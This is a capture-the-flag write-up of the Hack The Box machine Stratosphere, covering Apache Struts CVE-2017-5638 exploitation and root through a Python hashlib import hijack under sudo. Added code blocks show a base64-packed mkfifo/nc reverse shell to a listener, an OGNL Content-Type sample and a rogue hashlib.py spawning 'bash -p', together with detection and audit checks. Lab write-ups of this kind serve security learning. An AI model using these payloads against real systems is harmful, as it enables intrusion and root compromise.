HTB Stratosphere Write-Up

Introduction

This box was pretty fun, with some rabbit holes that can really frustrate you (speaking from experience). Even once the vulnerability is found things do not get easy, because the box carries a number of protections. Here is how I owned it. In short: the web service, an Apache Tomcat instance serving a Struts 2 application, was vulnerable to the Apache Struts remote code execution bug (CVE-2017-5638). Leveraging that, I recovered a user's credentials, logged in over SSH, and escalated to root by hijacking a Python library import through sudo, which is the Linux analogue of DLL injection.

Initial Enumeration

The first enumeration step is an nmap scan plus brute forcing of website directories. For this I used an automation tool I wrote called "AutoRecon", but you can always do it manually.

[Screenshots: Stratosphere scan output; the Gobuster scan; the login prompt at http://10.10.10.64/manager; and http://10.10.10.64/Monitoring/example/Welcome.action, which only shows "Under Construction!"]

Apache Struts Vulnerability

I noticed that the URLs of the second website were unusual: they ended in .action, which I had never seen before. That suffix is the default mapping for Apache Struts 2 actions, and the Struts version behind it turned out to be vulnerable to CVE-2017-5638, the OGNL injection in the Jakarta Multipart parser that is triggered by a crafted Content-Type request header.

Exploitation

So if RCE is possible we should be able to get a reverse shell and then own the box. I found an exploit via searchsploit (https://www.exploit-db.com/exploits/41570), but there was a problem. My first plan was to play around with the RCE and then send reverse shell commands through it to get a shell back on netcat, but that needs multi-part commands, and this exploit only accepts a single simple argument such as "ls" or "whoami". I tried to change that and only ended up complicating things. The single commands all worked, which was what I wanted, but the exploit still needed modifying. I searched for "CVE 2017-5638 github" and came across this beautiful repo: https://github.com/mazen160/struts-pwn. It had exactly what I wanted: I could run multiple commands at once ("I'm great at things like this" *>_<).
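To see why a single-argument exploit is actually enough for a reverse shell, here is an added example (my own code, not the page's and not from exploit 41570 or struts-pwn). It packs a multi-line reverse-shell script into one quote-free command string that fits inside the single-quoted OGNL `(#cmd='...')` literal those exploits build, and, for the defensive side, runs a small check over constructed Content-Type header samples that flags the OGNL expression syntax CVE-2017-5638 abuses. The listener address 10.10.14.5:4444 and the header samples are assumptions.

```python
import base64
import re

# Constructed multi-line reverse shell; listener 10.10.14.5:4444 is an assumption.
REVERSE_SHELL_SCRIPT = """\
rm -f /tmp/f
mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.5 4444 > /tmp/f
"""


def single_command(script: str) -> str:
    """Pack a multi-line script into one command with no quotes or newlines.

    The single-argument Struts exploits drop the command inside an OGNL
    string literal (#cmd='...') and run it through /bin/bash -c, so anything
    containing no single quote and no newline works. Base64 guarantees that.
    """
    b64 = base64.b64encode(script.encode()).decode()
    return f"echo {b64}|base64 -d|bash"


def unpack_single_command(cmd: str) -> str:
    """Inverse of single_command, handy for checking what a payload will run."""
    b64 = cmd[len("echo "):].split("|", 1)[0]
    return base64.b64decode(b64).decode()


def fits_single_arg(cmd: str) -> bool:
    """True if cmd can sit inside a single-quoted OGNL literal unchanged."""
    return "'" not in cmd and "\n" not in cmd


# Defensive side: CVE-2017-5638 is triggered through the Content-Type request
# header, which the Jakarta multipart parser ends up evaluating as OGNL.
# Anything that looks like an OGNL expression in that header is hostile.
OGNL_MARKERS = re.compile(
    r"[%$]\{|#_memberAccess|ognl\.OgnlContext|ProcessBuilder", re.IGNORECASE
)


def content_type_is_suspicious(value: str) -> bool:
    """Flag a Content-Type header value carrying OGNL expression syntax."""
    return bool(OGNL_MARKERS.search(value))


# Constructed header samples: two benign, one carrying an OGNL expression.
SAMPLE_CONTENT_TYPES = [
    "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "application/x-www-form-urlencoded",
    "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    ".(#cmd='whoami')}",
]


def triage(content_types):
    """Return the header values that should be alerted on."""
    return [ct for ct in content_types if content_type_is_suspicious(ct)]


if __name__ == "__main__":
    cmd = single_command(REVERSE_SHELL_SCRIPT)
    print(cmd)
    print("fits single-arg exploit:", fits_single_arg(cmd))
    print("suspicious headers:", triage(SAMPLE_CONTENT_TYPES))
```

The point of the wrapper is that the exploit executes the argument with `bash -c`, so pipes inside the one-liner work, and the script body is free to contain any quoting it likes because it is only decoded on the target. On the detection side, a WAF or log search keyed on the markers above catches the known payload shape, but the real fix was always patching Struts.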

Retrieving credentials from Database

[Screenshot: richard's credentials retrieved from the database. richard should secure his account asap]

Privilege Escalation — Python Library Hijacking

HTB has taught me many things, and one of them is abusing sudo to escalate. So that's what I did: sudo -l. It showed that richard could run a Python script as root, and that script imports hashlib. Python puts the directory of the script being run at the front of sys.path, ahead of the standard library, so a hashlib.py placed next to the script in /home/richard is imported instead of the real /usr/lib/python2.7/hashlib.py, and whatever it contains runs as root. This is the Linux equivalent of DLL search-order hijacking, which is why I think of it as DLL injection.

[Screenshot: the original hashlib.py in the /usr/lib/python2.7 directory]
[Screenshot: the custom made hashlib.py (exploit) in /home/richard]
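The import hijack in action, as an added example (my own code, not the page's exploit or the box's script). It builds a stand-in for the sudo-run script and the rogue hashlib.py in a temporary directory, parses the script's imports, and reports which of them can be shadowed by a file in the script's own directory, skipping built-in modules, which are never looked up on disk. The script contents, the module body (a `bash -p` one-liner that is written to disk but never imported or executed here) and the file name test.py are assumptions; the real script is not reproduced on the page.

```python
import ast
import os
import sys
import tempfile

# Constructed stand-in for the script sudo lets richard run as root (assumption:
# the page only shows that it imports hashlib).
TARGET_SCRIPT = """\
import hashlib
import sys
print(hashlib.md5(sys.argv[1].encode()).hexdigest())
"""

# Constructed stand-in for the rogue module. It is written to disk for the
# check below but never imported or run by this example.
EVIL_HASHLIB = """\
import os
os.system('/bin/bash -p')   # runs as whoever executes the importing script
"""


def imported_modules(source: str) -> list:
    """Top-level module names a script imports (import x / from x import y)."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def script_dir(script_path: str) -> str:
    # Python inserts this directory at sys.path[0] when the script is run,
    # ahead of the standard library. That ordering is the whole hijack.
    return os.path.dirname(os.path.abspath(script_path))


def shadowed_imports(script_path: str) -> list:
    """Imports already hijacked by a same-named .py next to the script."""
    with open(script_path) as f:
        mods = imported_modules(f.read())
    hits = []
    for mod in mods:
        # Built-in modules (sys, posix, ...) are compiled into the interpreter
        # and never looked up on disk, so they cannot be shadowed this way.
        if mod in sys.builtin_module_names:
            continue
        if os.path.exists(os.path.join(script_dir(script_path), mod + ".py")):
            hits.append(mod)
    return hits


def directory_writable(script_path: str) -> bool:
    """If the invoking user can write here, every non-builtin import is at risk."""
    return os.access(script_dir(script_path), os.W_OK)


def demo():
    """Plant the rogue hashlib.py and show the check catching it."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "test.py")
        with open(target, "w") as f:
            f.write(TARGET_SCRIPT)
        before = shadowed_imports(target)
        with open(os.path.join(d, "hashlib.py"), "w") as f:
            f.write(EVIL_HASHLIB)
        after = shadowed_imports(target)
        writable = directory_writable(target)
    return before, after, writable


if __name__ == "__main__":
    print(demo())   # ([], ['hashlib'], True)
```

The same check is a quick audit for any sudoers entry that runs an interpreter on a script: if the script lives in, or is invoked from, a directory the low-privilege user can write to, the entry is a root shell. On Python 3.4 and later, `-I` (isolated mode) keeps the script directory off sys.path; the Python 2.7 on this box has no such switch, so the fix there is ownership and permissions on the script's directory.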

Conclusion

In the end I enjoyed this box. I was so frustrated in the beginning, and I ignored what was in front of me for so long; it just goes to show how well these are made. There were many rabbit holes in this one! After finishing the box I tested the same library hijack on my home Kali machine, and it worked there too. Since I am the only user that is not a problem for me, but it can be a problem in a multi-user environment. This was my first blog post, I hope you enjoyed it! I plan to post more security related stuff: write-ups, exploits, CVEs and the like, so please look forward to it. Any suggestions or improvements to my steps are greatly welcome!
